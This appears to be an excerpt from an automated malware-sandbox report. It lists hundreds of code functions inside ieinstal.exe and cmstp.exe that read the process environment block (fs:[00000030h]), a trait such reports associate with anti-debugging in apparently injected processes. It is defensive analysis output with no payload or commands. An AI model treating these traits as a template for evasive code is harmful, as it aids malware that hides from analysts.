Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED44A2C mov eax, dword ptr fs:[00000030h] 18_2_1ED44A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED853CA mov eax, dword ptr fs:[00000030h] 18_2_1ED853CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED853CA mov eax, dword ptr fs:[00000030h] 18_2_1ED853CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2DBE9 mov eax, dword ptr fs:[00000030h] 18_2_1ED2DBE9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3B390 mov eax, dword ptr fs:[00000030h] 18_2_1ED3B390
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32397 mov eax, dword ptr fs:[00000030h] 18_2_1ED32397
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC138A mov eax, dword ptr fs:[00000030h] 18_2_1EDC138A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDBD380 mov ecx, dword ptr fs:[00000030h] 18_2_1EDBD380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED11B8F mov eax, dword ptr fs:[00000030h] 18_2_1ED11B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED11B8F mov eax, dword ptr fs:[00000030h] 18_2_1ED11B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD5BA5 mov eax, dword ptr fs:[00000030h] 18_2_1EDD5BA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34BAD mov eax, dword ptr fs:[00000030h] 18_2_1ED34BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34BAD mov eax, dword ptr fs:[00000030h] 18_2_1ED34BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34BAD mov eax, dword ptr fs:[00000030h] 18_2_1ED34BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8B58 mov eax, dword ptr fs:[00000030h] 18_2_1EDD8B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0F358 mov eax, dword ptr fs:[00000030h] 18_2_1ED0F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0DB40 mov eax, dword ptr fs:[00000030h] 18_2_1ED0DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED33B7A mov eax, dword ptr fs:[00000030h] 18_2_1ED33B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED33B7A mov eax, dword ptr fs:[00000030h] 18_2_1ED33B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0DB60 mov ecx, dword ptr fs:[00000030h] 18_2_1ED0DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC131B mov eax, dword ptr fs:[00000030h] 18_2_1EDC131B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED058EC mov eax, dword ptr fs:[00000030h] 18_2_1ED058EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09080 mov eax, dword ptr fs:[00000030h] 18_2_1ED09080
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED83884 mov eax, dword ptr fs:[00000030h] 18_2_1ED83884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED83884 mov eax, dword ptr fs:[00000030h] 18_2_1ED83884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov ecx, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov eax, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov eax, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED490AF mov eax, dword ptr fs:[00000030h] 18_2_1ED490AF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED20050 mov eax, dword ptr fs:[00000030h] 18_2_1ED20050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED20050 mov eax, dword ptr fs:[00000030h] 18_2_1ED20050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD1074 mov eax, dword ptr fs:[00000030h] 18_2_1EDD1074
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC2073 mov eax, dword ptr fs:[00000030h] 18_2_1EDC2073
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD4015 mov eax, dword ptr fs:[00000030h] 18_2_1EDD4015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD4015 mov eax, dword ptr fs:[00000030h] 18_2_1EDD4015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h] 18_2_1ED87016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h] 18_2_1ED87016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h] 18_2_1ED87016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED941E8 mov eax, dword ptr fs:[00000030h] 18_2_1ED941E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32990 mov eax, dword ptr fs:[00000030h] 18_2_1ED32990
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2C182 mov eax, dword ptr fs:[00000030h] 18_2_1ED2C182
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3A185 mov eax, dword ptr fs:[00000030h] 18_2_1ED3A185
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED361A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED361A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED361A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED361A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED869A6 mov eax, dword ptr fs:[00000030h] 18_2_1ED869A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2B944 mov eax, dword ptr fs:[00000030h] 18_2_1ED2B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2B944 mov eax, dword ptr fs:[00000030h] 18_2_1ED2B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B171 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B171 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0C962 mov eax, dword ptr fs:[00000030h] 18_2_1ED0C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h] 18_2_1ED09100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h] 18_2_1ED09100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h] 18_2_1ED09100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3513A mov eax, dword ptr fs:[00000030h] 18_2_1ED3513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3513A mov eax, dword ptr fs:[00000030h] 18_2_1ED3513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov ecx, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F746D mov eax, dword ptr fs:[00000030h] 27_2_047F746D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8CD6 mov eax, dword ptr fs:[00000030h] 27_2_048A8CD6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048914FB mov eax, dword ptr fs:[00000030h] 27_2_048914FB
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856CF0 mov eax, dword ptr fs:[00000030h] 27_2_04856CF0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856CF0 mov eax, dword ptr fs:[00000030h] 27_2_04856CF0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856CF0 mov eax, dword ptr fs:[00000030h] 27_2_04856CF0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A740D mov eax, dword ptr fs:[00000030h] 27_2_048A740D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A740D mov eax, dword ptr fs:[00000030h] 27_2_048A740D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A740D mov eax, dword ptr fs:[00000030h] 27_2_048A740D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891C06 mov eax, dword ptr fs:[00000030h] 27_2_04891C06
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856C0A mov eax, dword ptr fs:[00000030h] 27_2_04856C0A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856C0A mov eax, dword ptr fs:[00000030h] 27_2_04856C0A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856C0A mov eax, dword ptr fs:[00000030h] 27_2_04856C0A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856C0A mov eax, dword ptr fs:[00000030h] 27_2_04856C0A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480BC2C mov eax, dword ptr fs:[00000030h] 27_2_0480BC2C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A44B mov eax, dword ptr fs:[00000030h] 27_2_0480A44B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486C450 mov eax, dword ptr fs:[00000030h] 27_2_0486C450
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486C450 mov eax, dword ptr fs:[00000030h] 27_2_0486C450
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E849B mov eax, dword ptr fs:[00000030h] 27_2_047E849B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802581 mov eax, dword ptr fs:[00000030h] 27_2_04802581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802581 mov eax, dword ptr fs:[00000030h] 27_2_04802581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802581 mov eax, dword ptr fs:[00000030h] 27_2_04802581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802581 mov eax, dword ptr fs:[00000030h] 27_2_04802581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FC577 mov eax, dword ptr fs:[00000030h] 27_2_047FC577
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FC577 mov eax, dword ptr fs:[00000030h] 27_2_047FC577
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480FD9B mov eax, dword ptr fs:[00000030h] 27_2_0480FD9B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480FD9B mov eax, dword ptr fs:[00000030h] 27_2_0480FD9B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048035A1 mov eax, dword ptr fs:[00000030h] 27_2_048035A1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A05AC mov eax, dword ptr fs:[00000030h] 27_2_048A05AC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A05AC mov eax, dword ptr fs:[00000030h] 27_2_048A05AC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F7D50 mov eax, dword ptr fs:[00000030h] 27_2_047F7D50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04801DB5 mov eax, dword ptr fs:[00000030h] 27_2_04801DB5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04801DB5 mov eax, dword ptr fs:[00000030h] 27_2_04801DB5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04801DB5 mov eax, dword ptr fs:[00000030h] 27_2_04801DB5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h] 27_2_047E3D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov ecx, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h] 27_2_04856DC9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DAD30 mov eax, dword ptr fs:[00000030h] 27_2_047DAD30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0489FDE2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0489FDE2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0489FDE2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0489FDE2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04888DF1 mov eax, dword ptr fs:[00000030h] 27_2_04888DF1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047ED5E0 mov eax, dword ptr fs:[00000030h] 27_2_047ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047ED5E0 mov eax, dword ptr fs:[00000030h] 27_2_047ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489E539 mov eax, dword ptr fs:[00000030h] 27_2_0489E539
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0485A537 mov eax, dword ptr fs:[00000030h] 27_2_0485A537
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04804D3B mov eax, dword ptr fs:[00000030h] 27_2_04804D3B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04804D3B mov eax, dword ptr fs:[00000030h] 27_2_04804D3B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04804D3B mov eax, dword ptr fs:[00000030h] 27_2_04804D3B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8D34 mov eax, dword ptr fs:[00000030h] 27_2_048A8D34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04813D43 mov eax, dword ptr fs:[00000030h] 27_2_04813D43
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04853540 mov eax, dword ptr fs:[00000030h] 27_2_04853540
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04883D40 mov eax, dword ptr fs:[00000030h] 27_2_04883D40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h] 27_2_047D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h] 27_2_047D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h] 27_2_047D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h] 27_2_047D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h] 27_2_047D2D8A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486FE87 mov eax, dword ptr fs:[00000030h] 27_2_0486FE87
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h] 27_2_047FAE73
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h] 27_2_047FAE73
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h] 27_2_047FAE73
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h] 27_2_047FAE73
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h] 27_2_047FAE73
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E766D mov eax, dword ptr fs:[00000030h] 27_2_047E766D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048546A7 mov eax, dword ptr fs:[00000030h] 27_2_048546A7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A0EA5 mov eax, dword ptr fs:[00000030h] 27_2_048A0EA5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A0EA5 mov eax, dword ptr fs:[00000030h] 27_2_048A0EA5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A0EA5 mov eax, dword ptr fs:[00000030h] 27_2_048A0EA5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h] 27_2_047E7E41
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h] 27_2_047E7E41
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h] 27_2_047E7E41
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h] 27_2_047E7E41
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h] 27_2_047E7E41
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h] 27_2_047E7E41
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04818EC7 mov eax, dword ptr fs:[00000030h] 27_2_04818EC7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0488FEC0 mov eax, dword ptr fs:[00000030h] 27_2_0488FEC0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048036CC mov eax, dword ptr fs:[00000030h] 27_2_048036CC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8ED6 mov eax, dword ptr fs:[00000030h] 27_2_048A8ED6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DE620 mov eax, dword ptr fs:[00000030h] 27_2_047DE620
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048016E0 mov ecx, dword ptr fs:[00000030h] 27_2_048016E0
